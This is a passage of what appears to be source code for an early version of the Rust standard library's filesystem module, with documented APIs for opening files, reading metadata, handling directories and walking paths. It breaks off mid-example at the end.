/// This builder exposes the ability to configure how a `File` is opened and
/// what operations are permitted on the open file. The `File::open` and
/// `File::create` methods are aliases for commonly used options using this
/// builder.
///
/// Generally speaking, when using `OpenOptions`, you'll first call `new()`,
/// then chain calls to methods to set each option, then call `open()`, passing
/// the path of the file you're trying to open. This will give you a
/// [`io::Result`][result] with a [`File`][file] inside that you can further
/// operate on.
///
/// [result]: ../io/type.Result.html
/// [file]: struct.File.html
///
/// # Examples
///
/// Opening a file to read:
///
/// ```no_run
/// use std::fs::OpenOptions;
///
/// let file = OpenOptions::new().read(true).open("foo.txt");
/// ```
///
/// Opening a file for both reading and writing, as well as creating it if it
/// doesn't exist:
///
/// ```no_run
/// use std::fs::OpenOptions;
///
/// let file = OpenOptions::new()
/// .read(true)
/// .write(true)
/// .create(true)
/// .open("foo.txt");
/// ```
#[derive(Clone)]
#[stable(feature = "rust1", since = "1.0.0")]
pub struct OpenOptions(fs_imp::OpenOptions);
/// Representation of the various permissions on a file.
///
/// This module only currently provides one bit of information, `readonly`,
/// which is exposed on all currently supported platforms. Unix-specific
/// functionality, such as mode bits, is available through the
/// `os::unix::PermissionsExt` trait.
#[derive(Clone, PartialEq, Eq, Debug)]
#[stable(feature = "rust1", since = "1.0.0")]
pub struct Permissions(fs_imp::FilePermissions);
/// A structure representing a type of file with accessors for each file type.
#[unstable(feature = "file_type", reason = "recently added API")]
#[derive(Copy, Clone, PartialEq, Eq, Hash)]
pub struct FileType(fs_imp::FileType);
/// A builder used to create directories in various manners.
///
/// This builder also supports platform-specific options.
#[unstable(feature = "dir_builder", reason = "recently added API")]
pub struct DirBuilder {
inner: fs_imp::DirBuilder,
recursive: bool,
}
impl File {
/// Attempts to open a file in read-only mode.
///
/// See the `OpenOptions::open` method for more details.
///
/// # Errors
///
/// This function will return an error if `path` does not already exist.
/// Other errors may also be returned according to `OpenOptions::open`.
///
/// # Examples
///
/// ```no_run
/// use std::fs::File;
///
/// # fn foo() -> std::io::Result<()> {
/// let mut f = try!(File::open("foo.txt"));
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn open<P: AsRef<Path>>(path: P) -> io::Result<File> {
OpenOptions::new().read(true).open(path)
}
/// Opens a file in write-only mode.
///
/// This function will create a file if it does not exist,
/// and will truncate it if it does.
///
/// See the `OpenOptions::open` function for more details.
///
/// # Examples
///
/// ```no_run
/// use std::fs::File;
///
/// # fn foo() -> std::io::Result<()> {
/// let mut f = try!(File::create("foo.txt"));
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn create<P: AsRef<Path>>(path: P) -> io::Result<File> {
OpenOptions::new().write(true).create(true).truncate(true).open(path)
}
/// Returns `None`.
#[unstable(feature = "file_path",
reason = "this abstraction was imposed by this library and was removed")]
#[deprecated(since = "1.0.0", reason = "abstraction was removed")]
pub fn path(&self) -> Option<&Path> {
None
}
/// Attempts to sync all OS-internal metadata to disk.
///
/// This function will attempt to ensure that all in-core data reaches the
/// filesystem before returning.
///
/// # Examples
///
/// ```no_run
/// use std::fs::File;
/// use std::io::prelude::*;
///
/// # fn foo() -> std::io::Result<()> {
/// let mut f = try!(File::create("foo.txt"));
/// try!(f.write_all(b"Hello, world!"));
///
/// try!(f.sync_all());
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn sync_all(&self) -> io::Result<()> {
self.inner.fsync()
}
/// This function is similar to `sync_all`, except that it may not
/// synchronize file metadata to the filesystem.
///
/// This is intended for use cases that must synchronize content, but don't
/// need the metadata on disk. The goal of this method is to reduce disk
/// operations.
///
/// Note that some platforms may simply implement this in terms of
/// `sync_all`.
///
/// # Examples
///
/// ```no_run
/// use std::fs::File;
/// use std::io::prelude::*;
///
/// # fn foo() -> std::io::Result<()> {
/// let mut f = try!(File::create("foo.txt"));
/// try!(f.write_all(b"Hello, world!"));
///
/// try!(f.sync_data());
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn sync_data(&self) -> io::Result<()> {
self.inner.datasync()
}
/// Truncates or extends the underlying file, updating the size of
/// this file to become `size`.
///
/// If the `size` is less than the current file's size, then the file will
/// be shrunk. If it is greater than the current file's size, then the file
/// will be extended to `size` and have all of the intermediate data filled
/// in with 0s.
///
/// # Examples
///
/// ```no_run
/// use std::fs::File;
///
/// # fn foo() -> std::io::Result<()> {
/// let mut f = try!(File::open("foo.txt"));
/// try!(f.set_len(0));
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn set_len(&self, size: u64) -> io::Result<()> {
self.inner.truncate(size)
}
/// Queries metadata about the underlying file.
///
/// # Examples
///
/// ```no_run
/// use std::fs::File;
///
/// # fn foo() -> std::io::Result<()> {
/// let mut f = try!(File::open("foo.txt"));
/// let metadata = try!(f.metadata());
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn metadata(&self) -> io::Result<Metadata> {
self.inner.file_attr().map(Metadata)
}
}
impl AsInner<fs_imp::File> for File {
fn as_inner(&self) -> &fs_imp::File { &self.inner }
}
impl FromInner<fs_imp::File> for File {
fn from_inner(f: fs_imp::File) -> File {
File { inner: f }
}
}
impl fmt::Debug for File {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
self.inner.fmt(f)
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl Read for File {
fn read(&mut self, buf: &mut [u8]) -> io::Result<usize> {
self.inner.read(buf)
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl Write for File {
fn write(&mut self, buf: &[u8]) -> io::Result<usize> {
self.inner.write(buf)
}
fn flush(&mut self) -> io::Result<()> { self.inner.flush() }
}
#[stable(feature = "rust1", since = "1.0.0")]
impl Seek for File {
fn seek(&mut self, pos: SeekFrom) -> io::Result<u64> {
self.inner.seek(pos)
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a> Read for &'a File {
fn read(&mut self, buf: &mut [u8]) -> io::Result<usize> {
self.inner.read(buf)
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a> Write for &'a File {
fn write(&mut self, buf: &[u8]) -> io::Result<usize> {
self.inner.write(buf)
}
fn flush(&mut self) -> io::Result<()> { self.inner.flush() }
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a> Seek for &'a File {
fn seek(&mut self, pos: SeekFrom) -> io::Result<u64> {
self.inner.seek(pos)
}
}
impl OpenOptions {
    /// Creates a blank new set of options ready for configuration.
///
/// All options are initially set to `false`.
///
/// # Examples
///
/// ```no_run
/// use std::fs::OpenOptions;
///
/// let file = OpenOptions::new().open("foo.txt");
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn new() -> OpenOptions {
OpenOptions(fs_imp::OpenOptions::new())
}
/// Sets the option for read access.
///
/// This option, when true, will indicate that the file should be
/// `read`-able if opened.
///
/// # Examples
///
/// ```no_run
/// use std::fs::OpenOptions;
///
/// let file = OpenOptions::new().read(true).open("foo.txt");
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn read(&mut self, read: bool) -> &mut OpenOptions {
self.0.read(read); self
}
/// Sets the option for write access.
///
/// This option, when true, will indicate that the file should be
/// `write`-able if opened.
///
/// # Examples
///
/// ```no_run
/// use std::fs::OpenOptions;
///
/// let file = OpenOptions::new().write(true).open("foo.txt");
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn write(&mut self, write: bool) -> &mut OpenOptions {
self.0.write(write); self
}
/// Sets the option for the append mode.
///
/// This option, when true, means that writes will append to a file instead
/// of overwriting previous contents.
///
/// # Examples
///
/// ```no_run
/// use std::fs::OpenOptions;
///
/// let file = OpenOptions::new().append(true).open("foo.txt");
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn append(&mut self, append: bool) -> &mut OpenOptions {
self.0.append(append); self
}
/// Sets the option for truncating a previous file.
///
/// If a file is successfully opened with this option set it will truncate
/// the file to 0 length if it already exists.
///
/// # Examples
///
/// ```no_run
/// use std::fs::OpenOptions;
///
/// let file = OpenOptions::new().truncate(true).open("foo.txt");
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn truncate(&mut self, truncate: bool) -> &mut OpenOptions {
self.0.truncate(truncate); self
}
/// Sets the option for creating a new file.
///
/// This option indicates whether a new file will be created if the file
/// does not yet already exist.
///
/// # Examples
///
/// ```no_run
/// use std::fs::OpenOptions;
///
/// let file = OpenOptions::new().create(true).open("foo.txt");
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn create(&mut self, create: bool) -> &mut OpenOptions {
self.0.create(create); self
}
/// Opens a file at `path` with the options specified by `self`.
///
/// # Errors
///
/// This function will return an error under a number of different
/// circumstances, to include but not limited to:
///
/// * Opening a file that does not exist with read access.
/// * Attempting to open a file with access that the user lacks
/// permissions for
/// * Filesystem-level errors (full disk, etc)
///
/// # Examples
///
/// ```no_run
/// use std::fs::OpenOptions;
///
/// let file = OpenOptions::new().open("foo.txt");
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn open<P: AsRef<Path>>(&self, path: P) -> io::Result<File> {
let path = path.as_ref();
let inner = try!(fs_imp::File::open(path, &self.0));
Ok(File { inner: inner })
}
}
impl AsInnerMut<fs_imp::OpenOptions> for OpenOptions {
fn as_inner_mut(&mut self) -> &mut fs_imp::OpenOptions { &mut self.0 }
}
impl Metadata {
/// Returns the file type for this metadata.
#[unstable(feature = "file_type", reason = "recently added API")]
pub fn file_type(&self) -> FileType {
FileType(self.0.file_type())
}
/// Returns whether this metadata is for a directory.
///
/// # Examples
///
/// ```
/// # fn foo() -> std::io::Result<()> {
/// use std::fs;
///
/// let metadata = try!(fs::metadata("foo.txt"));
///
/// assert!(!metadata.is_dir());
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn is_dir(&self) -> bool { self.file_type().is_dir() }
/// Returns whether this metadata is for a regular file.
///
/// # Examples
///
/// ```
/// # fn foo() -> std::io::Result<()> {
/// use std::fs;
///
/// let metadata = try!(fs::metadata("foo.txt"));
///
/// assert!(metadata.is_file());
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn is_file(&self) -> bool { self.file_type().is_file() }
/// Returns the size of the file, in bytes, this metadata is for.
///
/// # Examples
///
/// ```
/// # fn foo() -> std::io::Result<()> {
/// use std::fs;
///
/// let metadata = try!(fs::metadata("foo.txt"));
///
/// assert_eq!(0, metadata.len());
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn len(&self) -> u64 { self.0.size() }
/// Returns the permissions of the file this metadata is for.
///
/// # Examples
///
/// ```
/// # fn foo() -> std::io::Result<()> {
/// use std::fs;
///
    /// let metadata = try!(fs::metadata("foo.txt"));
    ///
/// assert!(!metadata.permissions().readonly());
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn permissions(&self) -> Permissions {
Permissions(self.0.perm())
}
/// Returns the most recent access time for a file.
///
/// The return value is in milliseconds since the epoch.
#[unstable(feature = "fs_time",
reason = "the return type of u64 is not quite appropriate for \
this method and may change if the standard library \
gains a type to represent a moment in time")]
#[deprecated(since = "1.1.0",
reason = "use os::platform::fs::MetadataExt extension traits")]
pub fn accessed(&self) -> u64 {
self.adjust_time(self.0.accessed())
}
/// Returns the most recent modification time for a file.
///
/// The return value is in milliseconds since the epoch.
#[unstable(feature = "fs_time",
reason = "the return type of u64 is not quite appropriate for \
this method and may change if the standard library \
gains a type to represent a moment in time")]
#[deprecated(since = "1.1.0",
reason = "use os::platform::fs::MetadataExt extension traits")]
pub fn modified(&self) -> u64 {
self.adjust_time(self.0.modified())
}
fn adjust_time(&self, val: u64) -> u64 {
// FILETIME (what `val` represents) is in 100ns intervals and there are
// 10000 intervals in a millisecond.
if cfg!(windows) {val / 10000} else {val}
}
}
impl AsInner<fs_imp::FileAttr> for Metadata {
fn as_inner(&self) -> &fs_imp::FileAttr { &self.0 }
}
impl Permissions {
/// Returns whether these permissions describe a readonly file.
///
/// # Examples
///
/// ```
/// use std::fs::File;
///
/// # fn foo() -> std::io::Result<()> {
/// let mut f = try!(File::create("foo.txt"));
/// let metadata = try!(f.metadata());
///
/// assert_eq!(false, metadata.permissions().readonly());
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn readonly(&self) -> bool { self.0.readonly() }
/// Modifies the readonly flag for this set of permissions.
///
/// This operation does **not** modify the filesystem. To modify the
/// filesystem use the `fs::set_permissions` function.
///
/// # Examples
///
/// ```
/// use std::fs::File;
///
/// # fn foo() -> std::io::Result<()> {
/// let f = try!(File::create("foo.txt"));
/// let metadata = try!(f.metadata());
/// let mut permissions = metadata.permissions();
///
/// permissions.set_readonly(true);
///
/// // filesystem doesn't change
/// assert_eq!(false, metadata.permissions().readonly());
///
/// // just this particular `permissions`.
/// assert_eq!(true, permissions.readonly());
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn set_readonly(&mut self, readonly: bool) {
self.0.set_readonly(readonly)
}
}
#[unstable(feature = "file_type", reason = "recently added API")]
impl FileType {
/// Test whether this file type represents a directory.
pub fn is_dir(&self) -> bool { self.0.is_dir() }
/// Test whether this file type represents a regular file.
pub fn is_file(&self) -> bool { self.0.is_file() }
/// Test whether this file type represents a symbolic link.
pub fn is_symlink(&self) -> bool { self.0.is_symlink() }
}
impl FromInner<fs_imp::FilePermissions> for Permissions {
fn from_inner(f: fs_imp::FilePermissions) -> Permissions {
Permissions(f)
}
}
impl AsInner<fs_imp::FilePermissions> for Permissions {
fn as_inner(&self) -> &fs_imp::FilePermissions { &self.0 }
}
#[stable(feature = "rust1", since = "1.0.0")]
impl Iterator for ReadDir {
type Item = io::Result<DirEntry>;
fn next(&mut self) -> Option<io::Result<DirEntry>> {
self.0.next().map(|entry| entry.map(DirEntry))
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl DirEntry {
/// Returns the full path to the file that this entry represents.
///
/// The full path is created by joining the original path to `read_dir` or
/// `walk_dir` with the filename of this entry.
///
/// # Examples
///
/// ```
/// use std::fs;
/// # fn foo() -> std::io::Result<()> {
/// for entry in try!(fs::read_dir(".")) {
/// let dir = try!(entry);
/// println!("{:?}", dir.path());
/// }
/// # Ok(())
/// # }
/// ```
///
/// This prints output like:
///
/// ```text
/// "./whatever.txt"
/// "./foo.html"
/// "./hello_world.rs"
/// ```
///
/// The exact text, of course, depends on what files you have in `.`.
#[stable(feature = "rust1", since = "1.0.0")]
pub fn path(&self) -> PathBuf { self.0.path() }
/// Return the metadata for the file that this entry points at.
///
/// This function will not traverse symlinks if this entry points at a
/// symlink.
///
/// # Platform behavior
///
/// On Windows this function is cheap to call (no extra system calls
/// needed), but on Unix platforms this function is the equivalent of
/// calling `symlink_metadata` on the path.
#[unstable(feature = "dir_entry_ext", reason = "recently added API")]
pub fn metadata(&self) -> io::Result<Metadata> {
self.0.metadata().map(Metadata)
}
/// Return the file type for the file that this entry points at.
///
/// This function will not traverse symlinks if this entry points at a
/// symlink.
///
/// # Platform behavior
///
/// On Windows and most Unix platforms this function is free (no extra
/// system calls needed), but some Unix platforms may require the equivalent
/// call to `symlink_metadata` to learn about the target file type.
#[unstable(feature = "dir_entry_ext", reason = "recently added API")]
pub fn file_type(&self) -> io::Result<FileType> {
self.0.file_type().map(FileType)
}
/// Returns the bare file name of this directory entry without any other
/// leading path component.
#[unstable(feature = "dir_entry_ext", reason = "recently added API")]
pub fn file_name(&self) -> OsString {
self.0.file_name()
}
}
impl AsInner<fs_imp::DirEntry> for DirEntry {
fn as_inner(&self) -> &fs_imp::DirEntry { &self.0 }
}
/// Removes a file from the underlying filesystem.
///
/// Note that, just because an unlink call was successful, it is not
/// guaranteed that a file is immediately deleted (e.g. depending on
/// platform, other open file descriptors may prevent immediate removal).
///
/// # Errors
///
/// This function will return an error if `path` points to a directory, if the
/// user lacks permissions to remove the file, or if some other filesystem-level
/// error occurs.
///
/// # Examples
///
/// ```
/// use std::fs;
///
/// # fn foo() -> std::io::Result<()> {
/// try!(fs::remove_file("a.txt"));
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn remove_file<P: AsRef<Path>>(path: P) -> io::Result<()> {
fs_imp::unlink(path.as_ref())
}
/// Given a path, query the file system to get information about a file,
/// directory, etc.
///
/// This function will traverse symbolic links to query information about the
/// destination file.
///
/// # Examples
///
/// ```rust
/// # fn foo() -> std::io::Result<()> {
/// use std::fs;
///
/// let attr = try!(fs::metadata("/some/file/path.txt"));
/// // inspect attr ...
/// # Ok(())
/// # }
/// ```
///
/// # Errors
///
/// This function will return an error if the user lacks the requisite
/// permissions to perform a `metadata` call on the given `path` or if there
/// is no entry in the filesystem at the provided path.
#[stable(feature = "rust1", since = "1.0.0")]
pub fn metadata<P: AsRef<Path>>(path: P) -> io::Result<Metadata> {
fs_imp::stat(path.as_ref()).map(Metadata)
}
/// Query the metadata about a file without following symlinks.
///
/// # Examples
///
/// ```rust
/// #![feature(symlink_metadata)]
/// # fn foo() -> std::io::Result<()> {
/// use std::fs;
///
/// let attr = try!(fs::symlink_metadata("/some/file/path.txt"));
/// // inspect attr ...
/// # Ok(())
/// # }
/// ```
#[unstable(feature = "symlink_metadata", reason = "recently added API")]
pub fn symlink_metadata<P: AsRef<Path>>(path: P) -> io::Result<Metadata> {
fs_imp::lstat(path.as_ref()).map(Metadata)
}
/// Rename a file or directory to a new name.
///
/// # Errors
///
/// This function will return an error if the provided `from` doesn't exist, if
/// the process lacks permissions to view the contents, if `from` and `to`
/// reside on separate filesystems, or if some other intermittent I/O error
/// occurs.
///
/// # Examples
///
/// ```
/// use std::fs;
///
/// # fn foo() -> std::io::Result<()> {
/// try!(fs::rename("a.txt", "b.txt"));
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn rename<P: AsRef<Path>, Q: AsRef<Path>>(from: P, to: Q) -> io::Result<()> {
fs_imp::rename(from.as_ref(), to.as_ref())
}
/// Copies the contents of one file to another. This function will also
/// copy the permission bits of the original file to the destination file.
///
/// This function will **overwrite** the contents of `to`.
///
/// Note that if `from` and `to` both point to the same file, then the file
/// will likely get truncated by this operation.
///
/// # Errors
///
/// This function will return an error in the following situations, but is not
/// limited to just these cases:
///
/// * The `from` path is not a file
/// * The `from` file does not exist
/// * The current process does not have the permission rights to access
/// `from` or write `to`
///
/// # Examples
///
/// ```no_run
/// use std::fs;
///
/// # fn foo() -> std::io::Result<()> {
/// try!(fs::copy("foo.txt", "bar.txt"));
/// # Ok(()) }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn copy<P: AsRef<Path>, Q: AsRef<Path>>(from: P, to: Q) -> io::Result<u64> {
let from = from.as_ref();
let to = to.as_ref();
if !from.is_file() {
return Err(Error::new(ErrorKind::InvalidInput,
"the source path is not an existing file"))
}
let mut reader = try!(File::open(from));
let mut writer = try!(File::create(to));
let perm = try!(reader.metadata()).permissions();
let ret = try!(io::copy(&mut reader, &mut writer));
try!(set_permissions(to, perm));
Ok(ret)
}
/// Creates a new hard link on the filesystem.
///
/// The `dst` path will be a link pointing to the `src` path. Note that systems
/// often require these two paths to both be located on the same filesystem.
///
/// # Examples
///
/// ```
/// use std::fs;
///
/// # fn foo() -> std::io::Result<()> {
/// try!(fs::hard_link("a.txt", "b.txt"));
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn hard_link<P: AsRef<Path>, Q: AsRef<Path>>(src: P, dst: Q) -> io::Result<()> {
fs_imp::link(src.as_ref(), dst.as_ref())
}
/// Creates a new symbolic link on the filesystem.
///
/// The `dst` path will be a symbolic link pointing to the `src` path.
/// On Windows, this will be a file symlink, not a directory symlink;
/// for this reason, the platform-specific `std::os::unix::fs::symlink`
/// and `std::os::windows::fs::{symlink_file, symlink_dir}` should be
/// used instead to make the intent explicit.
///
/// # Examples
///
/// ```
/// use std::fs;
///
/// # fn foo() -> std::io::Result<()> {
/// try!(fs::soft_link("a.txt", "b.txt"));
/// # Ok(())
/// # }
/// ```
#[deprecated(since = "1.0.0",
reason = "replaced with std::os::unix::fs::symlink and \
std::os::windows::fs::{symlink_file, symlink_dir}")]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn soft_link<P: AsRef<Path>, Q: AsRef<Path>>(src: P, dst: Q) -> io::Result<()> {
fs_imp::symlink(src.as_ref(), dst.as_ref())
}
/// Reads a symbolic link, returning the file that the link points to.
///
/// # Errors
///
/// This function will return an error on failure. Failure conditions include
/// reading a file that does not exist or reading a file that is not a symbolic
/// link.
///
/// # Examples
///
/// ```
/// use std::fs;
///
/// # fn foo() -> std::io::Result<()> {
/// let path = try!(fs::read_link("a.txt"));
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn read_link<P: AsRef<Path>>(path: P) -> io::Result<PathBuf> {
fs_imp::readlink(path.as_ref())
}
/// Returns the canonical form of a path with all intermediate components
/// normalized and symbolic links resolved.
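///
/// # Examples
///
/// ```
/// #![feature(fs_canonicalize)]
/// # fn foo() -> std::io::Result<()> {
/// use std::fs;
///
/// // Illustrative path; canonicalization resolves the `..` components.
/// let path = try!(fs::canonicalize("../a/../foo.txt"));
/// # Ok(())
/// # }
/// ```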
#[unstable(feature = "fs_canonicalize", reason = "recently added API")]
pub fn canonicalize<P: AsRef<Path>>(path: P) -> io::Result<PathBuf> {
fs_imp::canonicalize(path.as_ref())
}
/// Creates a new, empty directory at the provided path
///
/// # Errors
///
/// This function will return an error if the user lacks permissions to make a
/// new directory at the provided `path`, or if the directory already exists.
///
/// # Examples
///
/// ```
/// use std::fs;
///
/// # fn foo() -> std::io::Result<()> {
/// try!(fs::create_dir("/some/dir"));
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn create_dir<P: AsRef<Path>>(path: P) -> io::Result<()> {
DirBuilder::new().create(path.as_ref())
}
/// Recursively create a directory and all of its parent components if they
/// are missing.
///
/// # Errors
///
/// This function will fail if any directory in the path specified by `path`
/// does not already exist and it could not be created otherwise. The specific
/// error conditions for when a directory is being created (after it is
/// determined to not exist) are outlined by `fs::create_dir`.
///
/// # Examples
///
/// ```
/// use std::fs;
///
/// # fn foo() -> std::io::Result<()> {
/// try!(fs::create_dir_all("/some/dir"));
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn create_dir_all<P: AsRef<Path>>(path: P) -> io::Result<()> {
DirBuilder::new().recursive(true).create(path.as_ref())
}
/// Removes an existing, empty directory.
///
/// # Errors
///
/// This function will return an error if the user lacks permissions to remove
/// the directory at the provided `path`, or if the directory isn't empty.
///
/// # Examples
///
/// ```
/// use std::fs;
///
/// # fn foo() -> std::io::Result<()> {
/// try!(fs::remove_dir("/some/dir"));
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn remove_dir<P: AsRef<Path>>(path: P) -> io::Result<()> {
fs_imp::rmdir(path.as_ref())
}
/// Removes a directory at this path, after removing all its contents. Use
/// carefully!
///
/// This function does **not** follow symbolic links and it will simply remove the
/// symbolic link itself.
///
/// # Errors
///
/// See `fs::remove_file` and `fs::remove_dir`.
///
/// # Examples
///
/// ```
/// use std::fs;
///
/// # fn foo() -> std::io::Result<()> {
/// try!(fs::remove_dir_all("/some/dir"));
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn remove_dir_all<P: AsRef<Path>>(path: P) -> io::Result<()> {
let path = path.as_ref();
for child in try!(read_dir(path)) {
let child = try!(child).path();
let stat = try!(symlink_metadata(&*child));
if stat.is_dir() {
try!(remove_dir_all(&*child));
} else {
try!(remove_file(&*child));
}
}
remove_dir(path)
}
/// Returns an iterator over the entries within a directory.
///
/// The iterator will yield instances of `io::Result<DirEntry>`. New errors may
/// be encountered after an iterator is initially constructed.
///
/// # Examples
///
/// ```
/// # #![feature(path_ext)]
/// use std::io;
/// use std::fs::{self, PathExt, DirEntry};
/// use std::path::Path;
///
/// // one possible implementation of fs::walk_dir only visiting files
/// fn visit_dirs(dir: &Path, cb: &mut FnMut(DirEntry)) -> io::Result<()> {
/// if dir.is_dir() {
/// for entry in try!(fs::read_dir(dir)) {
/// let entry = try!(entry);
/// if entry.path().is_dir() {
/// try!(visit_dirs(&entry.path(), cb));
/// } else {
/// cb(entry);
/// }
/// }
/// }
/// Ok(())
/// }
/// ```
///
/// # Errors
///
/// This function will return an error if the provided `path` doesn't exist, if
/// the process lacks permissions to view the contents, or if the `path` points
/// at a non-directory file.
#[stable(feature = "rust1", since = "1.0.0")]
pub fn read_dir<P: AsRef<Path>>(path: P) -> io::Result<ReadDir> {
fs_imp::readdir(path.as_ref()).map(ReadDir)
}
/// Returns an iterator that will recursively walk the directory structure
/// rooted at `path`.
///
/// The path given will not be iterated over, and this will perform iteration in
/// some top-down order. The contents of unreadable subdirectories are ignored.
///
/// The iterator will yield instances of `io::Result<DirEntry>`. New errors may
/// be encountered after an iterator is initially constructed.
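///
/// # Examples
///
/// A hedged sketch of walking a tree; the directory name is an
/// assumption for demonstration (requires the `fs_walk` feature):
///
/// ```
/// # #![feature(fs_walk)]
/// use std::fs;
///
/// # fn foo() -> std::io::Result<()> {
/// for entry in try!(fs::walk_dir("/some/dir")) {
///     let entry = try!(entry);
///     println!("{:?}", entry.path());
/// }
/// # Ok(())
/// # }
/// ```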
#[unstable(feature = "fs_walk",
reason = "the precise semantics and defaults for a recursive walk \
may change and this may end up accounting for files such \
as symlinks differently")]
pub fn walk_dir<P: AsRef<Path>>(path: P) -> io::Result<WalkDir> {
let start = try!(read_dir(path));
Ok(WalkDir { cur: Some(start), stack: Vec::new() })
}
#[unstable(feature = "fs_walk")]
impl Iterator for WalkDir {
type Item = io::Result<DirEntry>;
fn next(&mut self) -> Option<io::Result<DirEntry>> {
loop {
if let Some(ref mut cur) = self.cur {
match cur.next() {
Some(Err(e)) => return Some(Err(e)),
Some(Ok(next)) => {
let path = next.path();
if path.is_dir() {
self.stack.push(read_dir(&*path));
}
return Some(Ok(next))
}
None => {}
}
}
self.cur = None;
match self.stack.pop() {
Some(Err(e)) => return Some(Err(e)),
Some(Ok(next)) => self.cur = Some(next),
None => return None,
}
}
}
}
/// Utility methods for paths.
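///
/// A brief usage sketch (requires the `path_ext` feature; the path is
/// chosen only for illustration):
///
/// ```
/// # #![feature(path_ext)]
/// use std::fs::PathExt;
/// use std::path::Path;
///
/// let path = Path::new(".");
/// assert!(path.exists() && path.is_dir());
/// ```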
#[unstable(feature = "path_ext",
reason = "the precise set of methods exposed on this trait may \
change and some methods may be removed")]
pub trait PathExt {
/// Gets information on the file, directory, etc at this path.
///
/// Consult the `fs::metadata` documentation for more info.
///
    /// This call has the same runtime and error semantics as
    /// `fs::metadata`.
fn metadata(&self) -> io::Result<Metadata>;
/// Gets information on the file, directory, etc at this path.
///
/// Consult the `fs::symlink_metadata` documentation for more info.
///
    /// This call has the same runtime and error semantics as
    /// `fs::symlink_metadata`.
fn symlink_metadata(&self) -> io::Result<Metadata>;
    /// Returns the canonical form of a path, normalizing all components and
    /// eliminating all symlinks.
///
    /// This call has the same runtime and error semantics as
    /// `fs::canonicalize`.
fn canonicalize(&self) -> io::Result<PathBuf>;
/// Reads the symlink at this path.
///
/// For more information see `fs::read_link`.
fn read_link(&self) -> io::Result<PathBuf>;
/// Reads the directory at this path.
///
/// For more information see `fs::read_dir`.
fn read_dir(&self) -> io::Result<ReadDir>;
    /// Returns whether the underlying file exists on the local filesystem.
    /// Returns false in exactly the cases where `fs::metadata` fails.
fn exists(&self) -> bool;
/// Whether the underlying implementation (be it a file path, or something
/// else) points at a "regular file" on the FS. Will return false for paths
/// to non-existent locations or directories or other non-regular files
/// (named pipes, etc). Follows links when making this determination.
fn is_file(&self) -> bool;
/// Whether the underlying implementation (be it a file path, or something
/// else) is pointing at a directory in the underlying FS. Will return
/// false for paths to non-existent locations or if the item is not a
/// directory (eg files, named pipes, etc). Follows links when making this
/// determination.
fn is_dir(&self) -> bool;
}
impl PathExt for Path {
fn metadata(&self) -> io::Result<Metadata> { metadata(self) }
fn symlink_metadata(&self) -> io::Result<Metadata> { symlink_metadata(self) }
fn canonicalize(&self) -> io::Result<PathBuf> { canonicalize(self) }
fn read_link(&self) -> io::Result<PathBuf> { read_link(self) }
fn read_dir(&self) -> io::Result<ReadDir> { read_dir(self) }
fn exists(&self) -> bool { metadata(self).is_ok() }
fn is_file(&self) -> bool {
metadata(self).map(|s| s.is_file()).unwrap_or(false)
}
fn is_dir(&self) -> bool {
metadata(self).map(|s| s.is_dir()).unwrap_or(false)
}
}
/// Changes the timestamps for a file's last modification and access time.
///
/// The file at the path specified will have its last access time set to
/// `accessed` and its modification time set to `modified`. The times specified
/// should be in milliseconds.
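///
/// # Examples
///
/// An illustrative sketch; the path and the millisecond values are
/// assumptions for demonstration (requires the `fs_time` feature):
///
/// ```
/// # #![feature(fs_time)]
/// use std::fs;
///
/// # fn foo() -> std::io::Result<()> {
/// try!(fs::set_file_times("a.txt", 100000, 200000));
/// # Ok(())
/// # }
/// ```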
#[unstable(feature = "fs_time",
reason = "the argument type of u64 is not quite appropriate for \
this function and may change if the standard library \
gains a type to represent a moment in time")]
pub fn set_file_times<P: AsRef<Path>>(path: P, accessed: u64,
modified: u64) -> io::Result<()> {
fs_imp::utimes(path.as_ref(), accessed, modified)
}
/// Changes the permissions found on a file or a directory.
///
/// # Examples
///
/// ```
/// # #![feature(fs)]
/// # fn foo() -> std::io::Result<()> {
